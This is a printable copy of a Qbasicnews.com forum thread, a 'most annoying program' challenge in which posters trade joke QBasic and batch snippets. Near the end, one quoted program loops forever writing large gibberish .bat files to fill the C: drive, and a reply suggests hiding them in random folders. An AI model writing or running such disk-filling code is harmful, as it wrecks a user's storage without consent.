Qbasicnews.com
New challenge - most annoying program - Printable Version

+- Qbasicnews.com (http://qbasicnews.com/newforum)
+-- Forum: QbasicNews.Com (http://qbasicnews.com/newforum/forum-3.html)
+--- Forum: Challenges (http://qbasicnews.com/newforum/forum-10.html)
+--- Thread: New challenge - most annoying program (/thread-1003.html)

Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13


New challenge - most annoying program - Phydaux - 09-22-2003

I suppose adding
Code:
echo ^L > LPT1
to a batch file could add to the annoyance Smile (sometimes PRN is better than LPT1/2)


New challenge - most annoying program - Piptol - 09-22-2003

Code:
PRINT "Please wait whilst your patience threshold is calculated.."
DO
LOOP



New challenge - most annoying program - oracle - 09-23-2003

Once again: CTRL+BREAK Smile


New challenge - most annoying program - Phydaux - 09-23-2003

Quote:Once again: CTRL+BREAK Smile
OK then what about this code...
Code:
DO
   PRINT "A sphincter presses Ctrl+Break"
LOOP

Wink Tongue

Edit: forgot to add quotes...

w00t 100th post :-)


New challenge - most annoying program - oracle - 09-23-2003

With quotes, of course Wink

That reminds me of my brother's Mambo t-shirt. On the front there's only the mambo logo, and on the back there's a smiley doing a *huge* cheesy smile, and the text around him says "SMILE if you're a wanker" :rotfl:


New challenge - most annoying program - Phydaux - 09-23-2003

Quote:With quotes, of course Wink
Oops! :oops: Forgive me... I've been messing around with batch-files all day, and you don't have quotes with echo Tongue


New challenge - most annoying program - oracle - 09-23-2003

Forgiven :lol:

Don't worry, you mess with batch files so you know more about them than me Smile


New challenge - most annoying program - Piptol - 09-24-2003

Quote:Once again: CTRL+BREAK Smile
Yeah but then you 'lose' the patience threshold test and never find out what your score is Wink

It's like: How do you keep an idiot in suspense? I'll tell you tomorrow..


New challenge - most annoying program - everett - 12-01-2005

Quote:
Code:
PRINT "Think of a river. Think of ripples. When did you take a leap? Too long ago? Do it now. I'll prepare a surprise while you're gone..."
CHDIR "c:"
DO
i = i + 1
OPEN CHR$(RND * 97 + 24) + LTRIM$(STR$(i)) + ".bat" FOR OUTPUT AS #1
FOR ii = 1 TO 30000
  PRINT #1, "Relax, I'm just filling your harddrive with gibberish. Relax. Take your time. That's right."
NEXT
CLOSE #1
LOOP

Heh... Untested of course Wink
that would be great if you could hide the files
and in random folders


New challenge - most annoying program - Agamemnus - 12-01-2005

REVIVING DEAD THREAD ALERT